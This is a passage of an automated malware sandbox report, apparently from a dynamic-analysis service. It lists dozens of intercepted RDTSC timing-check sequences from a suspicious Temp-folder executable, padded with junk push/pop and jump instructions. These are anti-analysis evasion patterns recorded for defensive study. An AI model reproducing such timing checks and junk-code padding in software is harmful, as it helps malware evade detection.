Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 379628 second address: 37962D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37962D second address: 37963B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37963B second address: 37965B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7FDCFD22A6h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37965B second address: 379661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 379661 second address: 37966E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7FDCFD2296h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37966E second address: 37967E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7FDD3F186Ah 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380101 second address: 380118 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F7FDCFD229Dh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380118 second address: 38011C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3806A3 second address: 3806C7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7FDCFD2296h 0x00000008 jmp 00007F7FDCFD229Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F7FDCFD229Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3806C7 second address: 3806E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F1877h 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3806E8 second address: 3806ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 38097A second address: 38097E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 38097E second address: 380984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380984 second address: 38098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380AE4 second address: 380AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380AE8 second address: 380AF2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7FDD3F1866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380C2F second address: 380C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380C35 second address: 380C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380C3B second address: 380C52 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7FDCFD2296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F7FDCFD2296h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380C52 second address: 380C70 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F7FDD3F1875h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380C70 second address: 380C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F7FDCFD22A9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 381655 second address: 38165F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7FDD3F1866h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 38165F second address: 381663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 381D9C second address: 381DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 381DA1 second address: 381DA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3898FB second address: 3898FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3898FF second address: 389908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39A37A second address: 39A37E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39A37E second address: 39A39D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F7FDCFD22A0h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39A53C second address: 39A540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DF02 second address: 39DF06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DF06 second address: 39DF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F7FDD3F186Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F7FDD3F1866h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DF22 second address: 39DF28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DC35 second address: 39DC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DC3B second address: 39DC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DC41 second address: 39DC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F7FDD3F186Ah 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DC53 second address: 39DC6B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F7FDCFD22A1h 0x00000008 pop esi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3A6DA7 second address: 3A6DAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3A6DAB second address: 3A6DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F7FDCFD2296h 0x0000000e jmp 00007F7FDCFD22A4h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3A6DCD second address: 3A6DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3A6DD3 second address: 3A6DF4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7FDCFD229Ch 0x00000008 ja 00007F7FDCFD2296h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F7FDCFD2296h 0x00000016 jmp 00007F7FDCFD229Bh 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3A6DF4 second address: 3A6E1C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7FDD3F1866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F7FDD3F1870h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3ADB74 second address: 3ADB7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3ADB7A second address: 3ADB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7FDD3F1866h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3ADB84 second address: 3ADB9D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7FDCFD2296h 0x00000008 js 00007F7FDCFD2296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnp 00007F7FDCFD2296h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3C6C second address: 3B3C76 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7FDD3F1866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3C76 second address: 3B3C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3DB8 second address: 3B3DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3DBE second address: 3B3DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD229Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3F21 second address: 3B3F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3F27 second address: 3B3F35 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7FDCFD2296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3F35 second address: 3B3F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F1873h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B40A6 second address: 3B40DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7FDCFD22A5h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B40DA second address: 3B40F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F1877h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B40F7 second address: 3B40FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B4EE9 second address: 3B4EFF instructions: 0x00000000 rdtsc 0x00000002 js 00007F7FDD3F1866h 0x00000008 jng 00007F7FDD3F1866h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B4EFF second address: 3B4F15 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jl 00007F7FDCFD22BFh 0x0000000d pushad 0x0000000e jp 00007F7FDCFD2296h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B4F15 second address: 3B4F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B8B45 second address: 3B8B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B8B49 second address: 3B8B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B8B4F second address: 3B8B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F7FDCFD2296h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3BB5A0 second address: 3BB5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3BB5AE second address: 3BB5BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3BB5BF second address: 3BB5C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3BB5C3 second address: 3BB5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7FDCFD22A3h 0x0000000b jnp 00007F7FDCFD22AAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3CB175 second address: 3CB17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3CB17D second address: 3CB185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3C5016 second address: 3C5028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7FDD3F186Ch 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F3CAC second address: 3F3CBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7FDCFD229Dh 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F43C0 second address: 3F43E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7FDD3F186Bh 0x00000010 popad 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F7FDD3F1866h 0x0000001b jbe 00007F7FDD3F1866h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F43E7 second address: 3F43EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F46BB second address: 3F46D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7FDD3F186Fh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F47E7 second address: 3F47F7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7FDCFD2296h 0x00000008 jo 00007F7FDCFD2296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F4971 second address: 3F4981 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F7FDD3F1866h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F7696 second address: 3F769C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F78D8 second address: 3F78DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F78DC second address: 3F78E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F78E0 second address: 3F78EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F7FDD3F1866h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F78EE second address: 3F78F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F79D4 second address: 3F79D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F8EE6 second address: 3F8F2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F7FDCFD229Ch 0x0000000c pop edx 0x0000000d jo 00007F7FDCFD22AAh 0x00000013 jmp 00007F7FDCFD22A2h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7FDCFD22A7h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F8F2D second address: 3F8F46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7FDD3F186Eh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F8F46 second address: 3F8F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F8F4C second address: 3F8F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3F8F52 second address: 3F8F58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3FAD0D second address: 3FAD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3FAD11 second address: 3FAD1C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0E22 second address: 4EB0E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0E31 second address: 4EB0E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0E37 second address: 4EB0E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0E46 second address: 4EB0E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0E4A second address: 4EB0E50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
